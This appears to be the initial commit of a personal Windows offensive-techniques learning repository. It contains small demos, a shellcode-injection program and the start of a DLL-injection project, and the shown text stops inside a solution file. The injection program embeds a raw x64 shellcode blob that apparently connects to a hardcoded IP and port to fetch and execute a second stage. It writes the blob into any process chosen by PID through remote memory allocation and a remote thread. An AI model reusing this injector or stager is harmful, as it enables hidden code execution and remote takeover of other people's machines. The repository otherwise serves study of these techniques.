commit 0900ac1cdb5428e86ceabd68a80a994f8995313d Author: Rokas Puzonas Date: Fri Nov 3 16:58:05 2023 +0200 initial commit diff --git a/1-messagebox/.gitignore b/1-messagebox/.gitignore new file mode 100644 index 0000000..adb36c8 --- /dev/null +++ b/1-messagebox/.gitignore @@ -0,0 +1 @@ +*.exe \ No newline at end of file diff --git a/1-messagebox/.vscode/tasks.json b/1-messagebox/.vscode/tasks.json new file mode 100644 index 0000000..a6d8aad --- /dev/null +++ b/1-messagebox/.vscode/tasks.json @@ -0,0 +1,28 @@ +{ + "tasks": [ + { + "type": "cppbuild", + "label": "C/C++: gcc.exe build active file", + "command": "C:\\MinGW\\bin\\gcc.exe", + "args": [ + "-fdiagnostics-color=always", + "-g", + "${file}", + "-o", + "${fileDirname}\\${fileBasenameNoExtension}.exe" + ], + "options": { + "cwd": "${fileDirname}" + }, + "problemMatcher": [ + "$gcc" + ], + "group": { + "kind": "build", + "isDefault": true + }, + "detail": "Task generated by Debugger." + } + ], + "version": "2.0.0" +} \ No newline at end of file diff --git a/1-messagebox/main.c b/1-messagebox/main.c new file mode 100644 index 0000000..8a0e0fb --- /dev/null +++ b/1-messagebox/main.c @@ -0,0 +1,13 @@ +#include + +int main() { + + MessageBoxW( + NULL, + L"Hello, World!", + L"My awesome title", + MB_OK | MB_ICONEXCLAMATION + ); + + return 0; +} \ No newline at end of file diff --git a/2-createprocess/.gitignore b/2-createprocess/.gitignore new file mode 100644 index 0000000..adb36c8 --- /dev/null +++ b/2-createprocess/.gitignore @@ -0,0 +1 @@ +*.exe \ No newline at end of file diff --git a/2-createprocess/.vscode/tasks.json b/2-createprocess/.vscode/tasks.json new file mode 100644 index 0000000..a6d8aad --- /dev/null +++ b/2-createprocess/.vscode/tasks.json @@ -0,0 +1,28 @@ +{ + "tasks": [ + { + "type": "cppbuild", + "label": "C/C++: gcc.exe build active file", + "command": "C:\\MinGW\\bin\\gcc.exe", + "args": [ + "-fdiagnostics-color=always", + "-g", + "${file}", + "-o", + "${fileDirname}\\${fileBasenameNoExtension}.exe" + ], + "options": { + "cwd": "${fileDirname}" + }, + "problemMatcher": [ + "$gcc" + ], + "group": { + "kind": "build", + "isDefault": true + }, + "detail": "Task generated by Debugger." + } + ], + "version": "2.0.0" +} \ No newline at end of file diff --git a/2-createprocess/main.c b/2-createprocess/main.c new file mode 100644 index 0000000..6201049 --- /dev/null +++ b/2-createprocess/main.c @@ -0,0 +1,46 @@ +#include +#include + +int main() { + + STARTUPINFOW proc_start_info = { 0 }; + PROCESS_INFORMATION proc_info = { 0 }; + + if (!CreateProcessW( + L"C:\\Windows\\system32\\notepad.exe", + NULL, + NULL, + NULL, + FALSE, + BELOW_NORMAL_PRIORITY_CLASS, + NULL, + NULL, + &proc_start_info, + &proc_info + )) { + printf("Failed to create process: %ld\n", GetLastError()); + return -1; + } + + printf("Process started, pid: %ld, tid: %ld\n", proc_info.dwProcessId, proc_info.dwThreadId); + + + HANDLE h = OpenProcess( + PROCESS_QUERY_LIMITED_INFORMATION, + FALSE, + 7132 + ); + if (h == NULL) { + printf("Failed to open process: "); + DWORD err = GetLastError(); + if (err == ERROR_ACCESS_DENIED) { + printf("ERROR_ACCESS_DENIED"); + } else { + printf("%ld", GetLastError()); + } + printf("\n"); + return -1; + } + + return 0; +} \ No newline at end of file diff --git a/3-shellcode-injection/.gitignore b/3-shellcode-injection/.gitignore new file mode 100644 index 0000000..8dd4607 --- /dev/null +++ b/3-shellcode-injection/.gitignore @@ -0,0 +1,398 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. +## +## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore + +# User-specific files +*.rsuser +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Mono auto generated files +mono_crash.* + +# Build results +[Dd]ebug/ +[Dd]ebugPublic/ +[Rr]elease/ +[Rr]eleases/ +x64/ +x86/ +[Ww][Ii][Nn]32/ +[Aa][Rr][Mm]/ +[Aa][Rr][Mm]64/ +bld/ +[Bb]in/ +[Oo]bj/ +[Ll]og/ +[Ll]ogs/ + +# Visual Studio 2015/2017 cache/options directory +.vs/ +# Uncomment if you have tasks that create the project's static files in wwwroot +#wwwroot/ + +# Visual Studio 2017 auto generated files +Generated\ Files/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +# NUnit +*.VisualState.xml +TestResult.xml +nunit-*.xml + +# Build Results of an ATL Project +[Dd]ebugPS/ +[Rr]eleasePS/ +dlldata.c + +# Benchmark Results +BenchmarkDotNet.Artifacts/ + +# .NET Core +project.lock.json +project.fragment.lock.json +artifacts/ + +# ASP.NET Scaffolding +ScaffoldingReadMe.txt + +# StyleCop +StyleCopReport.xml + +# Files built by Visual Studio +*_i.c +*_p.c +*_h.h +*.ilk +*.meta +*.obj +*.iobj +*.pch +*.pdb +*.ipdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*_wpftmp.csproj +*.log +*.tlog +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Chutzpah Test files +_Chutzpah* + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile +*.VC.db +*.VC.VC.opendb + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# Visual Studio Trace Files +*.e2e + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper +*.DotSettings.user + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# AxoCover is a Code Coverage Tool +.axoCover/* +!.axoCover/settings.json + +# Coverlet is a free, cross platform Code Coverage Tool +coverage*.json +coverage*.xml +coverage*.info + +# Visual Studio code coverage results +*.coverage +*.coveragexml + +# NCrunch +_NCrunch_* +.*crunch*.local.xml +nCrunchTemp_* + +# MightyMoose +*.mm.* +AutoTest.Net/ + +# Web workbench (sass) +.sass-cache/ + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.[Pp]ublish.xml +*.azurePubxml +# Note: Comment the next line if you want to checkin your web deploy settings, +# but database connection strings (with potential passwords) will be unencrypted +*.pubxml +*.publishproj + +# Microsoft Azure Web App publish settings. Comment the next line if you want to +# checkin your Azure Web App publish settings, but sensitive information contained +# in these scripts will be unencrypted +PublishScripts/ + +# NuGet Packages +*.nupkg +# NuGet Symbol Packages +*.snupkg +# The packages folder can be ignored because of Package Restore +**/[Pp]ackages/* +# except build/, which is used as an MSBuild target. +!**/[Pp]ackages/build/ +# Uncomment if necessary however generally it will be regenerated when needed +#!**/[Pp]ackages/repositories.config +# NuGet v3's project.json files produces more ignorable files +*.nuget.props +*.nuget.targets + +# Microsoft Azure Build Output +csx/ +*.build.csdef + +# Microsoft Azure Emulator +ecf/ +rcf/ + +# Windows Store app package directories and files +AppPackages/ +BundleArtifacts/ +Package.StoreAssociation.xml +_pkginfo.txt +*.appx +*.appxbundle +*.appxupload + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!?*.[Cc]ache/ + +# Others +ClientBin/ +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.jfm +*.pfx +*.publishsettings +orleans.codegen.cs + +# Including strong name files can present a security risk +# (https://github.com/github/gitignore/pull/2483#issue-259490424) +#*.snk + +# Since there are multiple workflows, uncomment next line to ignore bower_components +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) +#bower_components/ + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm +ServiceFabricBackup/ +*.rptproj.bak + +# SQL Server files +*.mdf +*.ldf +*.ndf + +# Business Intelligence projects +*.rdl.data +*.bim.layout +*.bim_*.settings +*.rptproj.rsuser +*- [Bb]ackup.rdl +*- [Bb]ackup ([0-9]).rdl +*- [Bb]ackup ([0-9][0-9]).rdl + +# Microsoft Fakes +FakesAssemblies/ + +# GhostDoc plugin setting file +*.GhostDoc.xml + +# Node.js Tools for Visual Studio +.ntvs_analysis.dat +node_modules/ + +# Visual Studio 6 build log +*.plg + +# Visual Studio 6 workspace options file +*.opt + +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) +*.vbw + +# Visual Studio 6 auto-generated project file (contains which files were open etc.) +*.vbp + +# Visual Studio 6 workspace and project file (working project files containing files to include in project) +*.dsw +*.dsp + +# Visual Studio 6 technical files +*.ncb +*.aps + +# Visual Studio LightSwitch build output +**/*.HTMLClient/GeneratedArtifacts +**/*.DesktopClient/GeneratedArtifacts +**/*.DesktopClient/ModelManifest.xml +**/*.Server/GeneratedArtifacts +**/*.Server/ModelManifest.xml +_Pvt_Extensions + +# Paket dependency manager +.paket/paket.exe +paket-files/ + +# FAKE - F# Make +.fake/ + +# CodeRush personal settings +.cr/personal + +# Python Tools for Visual Studio (PTVS) +__pycache__/ +*.pyc + +# Cake - Uncomment if you are using it +# tools/** +# !tools/packages.config + +# Tabs Studio +*.tss + +# Telerik's JustMock configuration file +*.jmconfig + +# BizTalk build output +*.btp.cs +*.btm.cs +*.odx.cs +*.xsd.cs + +# OpenCover UI analysis results +OpenCover/ + +# Azure Stream Analytics local run output +ASALocalRun/ + +# MSBuild Binary and Structured Log +*.binlog + +# NVidia Nsight GPU debugger configuration file +*.nvuser + +# MFractors (Xamarin productivity tool) working folder +.mfractor/ + +# Local History for Visual Studio +.localhistory/ + +# Visual Studio History (VSHistory) files +.vshistory/ + +# BeatPulse healthcheck temp database +healthchecksdb + +# Backup folder for Package Reference Convert tool in Visual Studio 2017 +MigrationBackup/ + +# Ionide (cross platform F# VS Code tools) working folder +.ionide/ + +# Fody - auto-generated XML schema +FodyWeavers.xsd + +# VS Code files for those working on multiple tools +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +*.code-workspace + +# Local History for Visual Studio Code +.history/ + +# Windows Installer files from build outputs +*.cab +*.msi +*.msix +*.msm +*.msp + +# JetBrains Rider +*.sln.iml \ No newline at end of file diff --git a/3-shellcode-injection/3-shellcode-injection.sln b/3-shellcode-injection/3-shellcode-injection.sln new file mode 100644 index 0000000..4a0af28 --- /dev/null +++ b/3-shellcode-injection/3-shellcode-injection.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.7.34221.43 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "3-shellcode-injection", "3-shellcode-injection.vcxproj", "{990F104E-3A02-4449-A3D9-138E3E0B0AE2}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {990F104E-3A02-4449-A3D9-138E3E0B0AE2}.Debug|x64.ActiveCfg = Debug|x64 + {990F104E-3A02-4449-A3D9-138E3E0B0AE2}.Debug|x64.Build.0 = Debug|x64 + {990F104E-3A02-4449-A3D9-138E3E0B0AE2}.Debug|x86.ActiveCfg = Debug|Win32 + {990F104E-3A02-4449-A3D9-138E3E0B0AE2}.Debug|x86.Build.0 = Debug|Win32 + {990F104E-3A02-4449-A3D9-138E3E0B0AE2}.Release|x64.ActiveCfg = Release|x64 + {990F104E-3A02-4449-A3D9-138E3E0B0AE2}.Release|x64.Build.0 = Release|x64 + {990F104E-3A02-4449-A3D9-138E3E0B0AE2}.Release|x86.ActiveCfg = Release|Win32 + {990F104E-3A02-4449-A3D9-138E3E0B0AE2}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {7D0476EC-6F4C-4A2D-9B0A-6EC243FA3201} + EndGlobalSection +EndGlobal diff --git a/3-shellcode-injection/3-shellcode-injection.vcxproj b/3-shellcode-injection/3-shellcode-injection.vcxproj new file mode 100644 index 0000000..89b3efb --- /dev/null +++ b/3-shellcode-injection/3-shellcode-injection.vcxproj @@ -0,0 +1,135 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 17.0 + Win32Proj + {990f104e-3a02-4449-a3d9-138e3e0b0ae2} + My3shellcodeinjection + 10.0 + + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + Application + true + v143 + Unicode + + + Application + false + v143 + true + Unicode + + + + + + + + + + + + + + + + + + + + + + Level3 + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + Level3 + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + Level3 + true + true + true + NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/3-shellcode-injection/3-shellcode-injection.vcxproj.filters b/3-shellcode-injection/3-shellcode-injection.vcxproj.filters new file mode 100644 index 0000000..ce0c35c --- /dev/null +++ b/3-shellcode-injection/3-shellcode-injection.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/3-shellcode-injection/main.cpp b/3-shellcode-injection/main.cpp new file mode 100644 index 0000000..f91a714 --- /dev/null +++ b/3-shellcode-injection/main.cpp @@ -0,0 +1,104 @@ +#include +#include + +#define log_info(msg, ...) printf("[*] " msg "\n", ##__VA_ARGS__) +#define log_err(msg, ...) printf("[-] " msg "\n", ##__VA_ARGS__) +#define log_ok(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__) + +char g_shellcode[] = +"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" +"\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52" +"\x18\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48" +"\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" +"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" +"\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f" +"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0" +"\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49" +"\x01\xd0\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88" +"\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" +"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8" +"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" +"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58\x48\x01" +"\xd0\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83" +"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9" +"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00" +"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49" +"\x89\xe5\x49\xbc\x02\x00\x30\x39\xac\x18\xe5\x06\x41\x54" +"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5" +"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b" +"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31" +"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41" +"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58" +"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5" +"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00" +"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58" +"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00" +"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68" +"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba" +"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31" +"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9" +"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68" +"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f" +"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49" +"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48" +"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2" +"\xf0\xb5\xa2\x56\xff\xd5"; + +int main(int argc, char **argv) { + if (argc < 2) { + log_err("Usage: %s ", argv[0]); + return -1; + } + + DWORD pid = atoi(argv[1]); + log_info("Opening process with pid %ld", pid); + + HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pid); + if (process == NULL) { + log_err("Failed to open process: %ld", GetLastError()); + return -1; + } + log_ok("Successfully opened process handle"); + + LPVOID buffer = VirtualAllocEx(process, NULL, sizeof(g_shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (buffer == NULL) { + log_err("Failed to allocate %lld bytes in process: %ld", sizeof(g_shellcode), GetLastError()); + CloseHandle(process); + return -1; + } + log_ok("Allocated %lld bytes in process", sizeof(g_shellcode)); + + if (!WriteProcessMemory(process, buffer, g_shellcode, sizeof(g_shellcode), NULL)) { + log_err("Failed to write bytes: %ld", GetLastError()); + CloseHandle(process); + return -1; + } + log_ok("Wrote shellcode to allocated buffer"); + + DWORD thread_id = 0; + HANDLE thread = CreateRemoteThreadEx( + process, + NULL, + 0, + (LPTHREAD_START_ROUTINE)buffer, + NULL, + 0, + 0, + &thread_id + ); + if (thread == NULL) { + log_err("Failed create remote thread: %ld", GetLastError()); + CloseHandle(process); + return -1; + } + log_ok("Successfully created thread with shellcode, thread id: %ld", thread_id); + + log_info("Waiting for thread to finish..."); + WaitForSingleObject(thread, INFINITE); + log_info("Thread finished"); + + log_info("Cleaning up"); + CloseHandle(thread); + CloseHandle(process); + return 0; +} \ No newline at end of file diff --git a/4-dll-injection/.gitignore b/4-dll-injection/.gitignore new file mode 100644 index 0000000..8dd4607 --- /dev/null +++ b/4-dll-injection/.gitignore @@ -0,0 +1,398 @@ +## Ignore Visual Studio temporary files, build results, and +## files generated by popular Visual Studio add-ons. +## +## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore + +# User-specific files +*.rsuser +*.suo +*.user +*.userosscache +*.sln.docstates + +# User-specific files (MonoDevelop/Xamarin Studio) +*.userprefs + +# Mono auto generated files +mono_crash.* + +# Build results +[Dd]ebug/ +[Dd]ebugPublic/ +[Rr]elease/ +[Rr]eleases/ +x64/ +x86/ +[Ww][Ii][Nn]32/ +[Aa][Rr][Mm]/ +[Aa][Rr][Mm]64/ +bld/ +[Bb]in/ +[Oo]bj/ +[Ll]og/ +[Ll]ogs/ + +# Visual Studio 2015/2017 cache/options directory +.vs/ +# Uncomment if you have tasks that create the project's static files in wwwroot +#wwwroot/ + +# Visual Studio 2017 auto generated files +Generated\ Files/ + +# MSTest test Results +[Tt]est[Rr]esult*/ +[Bb]uild[Ll]og.* + +# NUnit +*.VisualState.xml +TestResult.xml +nunit-*.xml + +# Build Results of an ATL Project +[Dd]ebugPS/ +[Rr]eleasePS/ +dlldata.c + +# Benchmark Results +BenchmarkDotNet.Artifacts/ + +# .NET Core +project.lock.json +project.fragment.lock.json +artifacts/ + +# ASP.NET Scaffolding +ScaffoldingReadMe.txt + +# StyleCop +StyleCopReport.xml + +# Files built by Visual Studio +*_i.c +*_p.c +*_h.h +*.ilk +*.meta +*.obj +*.iobj +*.pch +*.pdb +*.ipdb +*.pgc +*.pgd +*.rsp +*.sbr +*.tlb +*.tli +*.tlh +*.tmp +*.tmp_proj +*_wpftmp.csproj +*.log +*.tlog +*.vspscc +*.vssscc +.builds +*.pidb +*.svclog +*.scc + +# Chutzpah Test files +_Chutzpah* + +# Visual C++ cache files +ipch/ +*.aps +*.ncb +*.opendb +*.opensdf +*.sdf +*.cachefile +*.VC.db +*.VC.VC.opendb + +# Visual Studio profiler +*.psess +*.vsp +*.vspx +*.sap + +# Visual Studio Trace Files +*.e2e + +# TFS 2012 Local Workspace +$tf/ + +# Guidance Automation Toolkit +*.gpState + +# ReSharper is a .NET coding add-in +_ReSharper*/ +*.[Rr]e[Ss]harper +*.DotSettings.user + +# TeamCity is a build add-in +_TeamCity* + +# DotCover is a Code Coverage Tool +*.dotCover + +# AxoCover is a Code Coverage Tool +.axoCover/* +!.axoCover/settings.json + +# Coverlet is a free, cross platform Code Coverage Tool +coverage*.json +coverage*.xml +coverage*.info + +# Visual Studio code coverage results +*.coverage +*.coveragexml + +# NCrunch +_NCrunch_* +.*crunch*.local.xml +nCrunchTemp_* + +# MightyMoose +*.mm.* +AutoTest.Net/ + +# Web workbench (sass) +.sass-cache/ + +# Installshield output folder +[Ee]xpress/ + +# DocProject is a documentation generator add-in +DocProject/buildhelp/ +DocProject/Help/*.HxT +DocProject/Help/*.HxC +DocProject/Help/*.hhc +DocProject/Help/*.hhk +DocProject/Help/*.hhp +DocProject/Help/Html2 +DocProject/Help/html + +# Click-Once directory +publish/ + +# Publish Web Output +*.[Pp]ublish.xml +*.azurePubxml +# Note: Comment the next line if you want to checkin your web deploy settings, +# but database connection strings (with potential passwords) will be unencrypted +*.pubxml +*.publishproj + +# Microsoft Azure Web App publish settings. Comment the next line if you want to +# checkin your Azure Web App publish settings, but sensitive information contained +# in these scripts will be unencrypted +PublishScripts/ + +# NuGet Packages +*.nupkg +# NuGet Symbol Packages +*.snupkg +# The packages folder can be ignored because of Package Restore +**/[Pp]ackages/* +# except build/, which is used as an MSBuild target. +!**/[Pp]ackages/build/ +# Uncomment if necessary however generally it will be regenerated when needed +#!**/[Pp]ackages/repositories.config +# NuGet v3's project.json files produces more ignorable files +*.nuget.props +*.nuget.targets + +# Microsoft Azure Build Output +csx/ +*.build.csdef + +# Microsoft Azure Emulator +ecf/ +rcf/ + +# Windows Store app package directories and files +AppPackages/ +BundleArtifacts/ +Package.StoreAssociation.xml +_pkginfo.txt +*.appx +*.appxbundle +*.appxupload + +# Visual Studio cache files +# files ending in .cache can be ignored +*.[Cc]ache +# but keep track of directories ending in .cache +!?*.[Cc]ache/ + +# Others +ClientBin/ +~$* +*~ +*.dbmdl +*.dbproj.schemaview +*.jfm +*.pfx +*.publishsettings +orleans.codegen.cs + +# Including strong name files can present a security risk +# (https://github.com/github/gitignore/pull/2483#issue-259490424) +#*.snk + +# Since there are multiple workflows, uncomment next line to ignore bower_components +# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) +#bower_components/ + +# RIA/Silverlight projects +Generated_Code/ + +# Backup & report files from converting an old project file +# to a newer Visual Studio version. Backup files are not needed, +# because we have git ;-) +_UpgradeReport_Files/ +Backup*/ +UpgradeLog*.XML +UpgradeLog*.htm +ServiceFabricBackup/ +*.rptproj.bak + +# SQL Server files +*.mdf +*.ldf +*.ndf + +# Business Intelligence projects +*.rdl.data +*.bim.layout +*.bim_*.settings +*.rptproj.rsuser +*- [Bb]ackup.rdl +*- [Bb]ackup ([0-9]).rdl +*- [Bb]ackup ([0-9][0-9]).rdl + +# Microsoft Fakes +FakesAssemblies/ + +# GhostDoc plugin setting file +*.GhostDoc.xml + +# Node.js Tools for Visual Studio +.ntvs_analysis.dat +node_modules/ + +# Visual Studio 6 build log +*.plg + +# Visual Studio 6 workspace options file +*.opt + +# Visual Studio 6 auto-generated workspace file (contains which files were open etc.) +*.vbw + +# Visual Studio 6 auto-generated project file (contains which files were open etc.) +*.vbp + +# Visual Studio 6 workspace and project file (working project files containing files to include in project) +*.dsw +*.dsp + +# Visual Studio 6 technical files +*.ncb +*.aps + +# Visual Studio LightSwitch build output +**/*.HTMLClient/GeneratedArtifacts +**/*.DesktopClient/GeneratedArtifacts +**/*.DesktopClient/ModelManifest.xml +**/*.Server/GeneratedArtifacts +**/*.Server/ModelManifest.xml +_Pvt_Extensions + +# Paket dependency manager +.paket/paket.exe +paket-files/ + +# FAKE - F# Make +.fake/ + +# CodeRush personal settings +.cr/personal + +# Python Tools for Visual Studio (PTVS) +__pycache__/ +*.pyc + +# Cake - Uncomment if you are using it +# tools/** +# !tools/packages.config + +# Tabs Studio +*.tss + +# Telerik's JustMock configuration file +*.jmconfig + +# BizTalk build output +*.btp.cs +*.btm.cs +*.odx.cs +*.xsd.cs + +# OpenCover UI analysis results +OpenCover/ + +# Azure Stream Analytics local run output +ASALocalRun/ + +# MSBuild Binary and Structured Log +*.binlog + +# NVidia Nsight GPU debugger configuration file +*.nvuser + +# MFractors (Xamarin productivity tool) working folder +.mfractor/ + +# Local History for Visual Studio +.localhistory/ + +# Visual Studio History (VSHistory) files +.vshistory/ + +# BeatPulse healthcheck temp database +healthchecksdb + +# Backup folder for Package Reference Convert tool in Visual Studio 2017 +MigrationBackup/ + +# Ionide (cross platform F# VS Code tools) working folder +.ionide/ + +# Fody - auto-generated XML schema +FodyWeavers.xsd + +# VS Code files for those working on multiple tools +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +*.code-workspace + +# Local History for Visual Studio Code +.history/ + +# Windows Installer files from build outputs +*.cab +*.msi +*.msix +*.msm +*.msp + +# JetBrains Rider +*.sln.iml \ No newline at end of file diff --git a/4-dll-injection/4-dll-injection.sln b/4-dll-injection/4-dll-injection.sln new file mode 100644 index 0000000..845d8bb --- /dev/null +++ b/4-dll-injection/4-dll-injection.sln @@ -0,0 +1,41 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.7.34221.43 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "my-dll", "my-dll\my-dll.vcxproj", "{B1344F8D-BCF5-489E-95E3-D15B7850250B}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "injecting-dll", "injecting-dll\injecting-dll.vcxproj", "{BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {B1344F8D-BCF5-489E-95E3-D15B7850250B}.Debug|x64.ActiveCfg = Debug|x64 + {B1344F8D-BCF5-489E-95E3-D15B7850250B}.Debug|x64.Build.0 = Debug|x64 + {B1344F8D-BCF5-489E-95E3-D15B7850250B}.Debug|x86.ActiveCfg = Debug|Win32 + {B1344F8D-BCF5-489E-95E3-D15B7850250B}.Debug|x86.Build.0 = Debug|Win32 + {B1344F8D-BCF5-489E-95E3-D15B7850250B}.Release|x64.ActiveCfg = Release|x64 + {B1344F8D-BCF5-489E-95E3-D15B7850250B}.Release|x64.Build.0 = Release|x64 + {B1344F8D-BCF5-489E-95E3-D15B7850250B}.Release|x86.ActiveCfg = Release|Win32 + {B1344F8D-BCF5-489E-95E3-D15B7850250B}.Release|x86.Build.0 = Release|Win32 + {BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}.Debug|x64.ActiveCfg = Debug|x64 + {BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}.Debug|x64.Build.0 = Debug|x64 + {BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}.Debug|x86.ActiveCfg = Debug|Win32 + {BC4EEC10-1490-4C6E-A053-ECFDDE0B6970}.Debug|x86.Build.0 = Debug|Win32 + 